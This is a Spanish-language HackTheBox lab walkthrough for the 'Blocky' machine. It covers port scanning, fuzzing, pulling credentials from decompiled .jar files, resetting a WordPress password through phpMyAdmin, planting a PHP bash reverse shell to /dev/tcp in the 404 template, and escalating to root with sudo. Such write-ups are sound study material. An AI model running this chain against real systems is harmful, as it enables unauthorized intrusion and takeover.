Volver atras HTB_Blocky | Savinotes

HTB_Blocky

Blocky {-}

Introduccion {-}

La maquina del dia 30/07/2021 se llama Blocky .

El replay del live se puede ver aqui

S4vitaar Blocky maquina

No olvideis dejar un like al video y un comentario…

Enumeracion {-}

Reconocimiento de maquina, puertos abiertos y servicios {-}

Ping {-}

ping -c 1 10.10.10.37

ttl: 63 -> maquina linux. Recuerda que en cuanto a ttl se trata, 64 = linux y 128 = windows. Pero como estamos en hackthebox hay un nodo intermediario que hace que el ttl disminuya una unidad

Nmap {-}

nmap -p- --open -T5 -v -n 10.10.10.37 

si consideras que va muy lento el escaneo puedes poner los siguientes parametros para que valla mucho mas rapido

nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn 10.10.10.37 -oG allPorts 
extractPorts allPorts
nmap -sC -sV -p21,22,80,25565 10.10.10.37 -oN targeted
PuertoServicioQue se nos occure?Que falta?
21ftpconectar como anonymous
22sshconexion directausuario y contraseña
80httpAnalisis de la web y Fuzzing
25565minecraftcon el puerto 53 pensamos en virt hosting

Conectar al ftp como anonymous {-}

ftp 10.10.10.37
Name: anonymous
password: <enter>
#Output
530 Login incorrect.

No nos deja entrar como anonymous

Analizando la web {-}

Whatweb {-}

whatweb http://10.10.10.37

Aqui vemos que estamos en un Wordpress

http-enum {-}

Lanzamos un web scan con nmap.

nmap --script http-enum -p80 10.10.10.37 -oN webScan

Ya nos detecta un

 /phpmyadmin/ 

y ficheros de wordpress

Chequear la web del puerto 80 {-}

Con firefox navegamos en la web para ver lo que es.

Como es un wordpress intentamos ir al

 http://10.10.10.37/wp-login.php 

y miramos si hay el usuario NOTCH. Efectivamente el usuario NOTCH existe.

Vamos a por el

 http://10.10.10.37/phpmyadmin/ 

y buscamos previamente en google si encontramos credenciales por defecto pero no funcionan.

Tenemos que ir buscando mas rutas.

Fuzzing con WFuzz {-}

wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.37/WFUZZ

Encontramos un ruta plugins que no suele ser normal porque en wordpress los plugins suelen estar en

 /wp-content/plugins 

y no en

 /plugins 

directamente

Aqui encontramos dos ficheros

 .jar 

. Los descargamos en nuestra maquina de atacante.

Evaluacion de vulnerabilidades {-}

Analizamos los ficheros {-}

Los ficheros

 .jar 

son ficheros comprimidos que se pueden descomprimir con la herramienta

 unzip 
unzip BlockyCore.jar
unzip griefprevention-1.11.2-3.1.1.298.jar

Ya tenemos ficheros

 .class 

que podemos analizar con strings o mejor con javap

javap -c Blockycore.class

Aqui ya podemos ver cosas como un usuario root y una contraseña para un sqlUser.

Aqui vamos a la url

 http://10.10.10.37/phpmyadmin/ 

y probamos. Ya podemos entrar en el panel de configuracion de la base de datos.

Vemos la base de datos de wordpress y le cambiamos la contraseña al usuario NOTCH. Lo unico seria seleccionnar la Funcion MD5 al lado de la contraseña.

hmyadmi-otch Intentamos conectar al wordpress con el usuario NOTCH y su nueva contraseña y pa dentro.

Editar el 404 Template de Wordpress {-}

Cada vez que se puede entrar en el panel de administracion de wordpress siempre hacemos lo mismo.

Pinchamos en

 Appearance > Editor 

y retocamos el fichero 404 Template.

[ ! ] Nota: Si este fichero no existe, justo encima, se puede Select theme to edit y buscar otro tema.

Explotacion de vulnerabilidad & Ganando Acceso {-}

Crear una reverse shell desde la 404 Template {-}

Nos ponemos en escucha con el puerto 443.

nc -nlvp 443

Editamos el fichero 404 Template con una reverse shell en php

<?php
    system("bash -c 'bash -i >& /dev/tcp/10.10.14.7/443 0>&1'");
?>

ya podemos ir al url

 http://10.10.10.37/?p=404.php 

y pa dentro

Tratamiento de la TTY {-}

script /dev/null -c bash
^Z
stty raw -echo; fg
-> reset
-> xterm
export TERM=xterm
export SHELL=bash

stty -a

stty rows <rownb> columns <colnb>

User Pivoting al usuario notch {-}

Miramos si hay reutilisacion de contraseñas

su notch 

Y con la contraseña encontrada en el ficher

 BlockyCore.class 

funciona. Y ya podemos ver la flag.## Escalada de privilegios {-}

Rootear la maquina {-}

sudo -l
#Output
(ALL : ALL) ALL

Vemos que el usuario notch puede efectuar cualquier comando como qualquier usuario ;)

sudo su
whoami

root

Ya esta ;)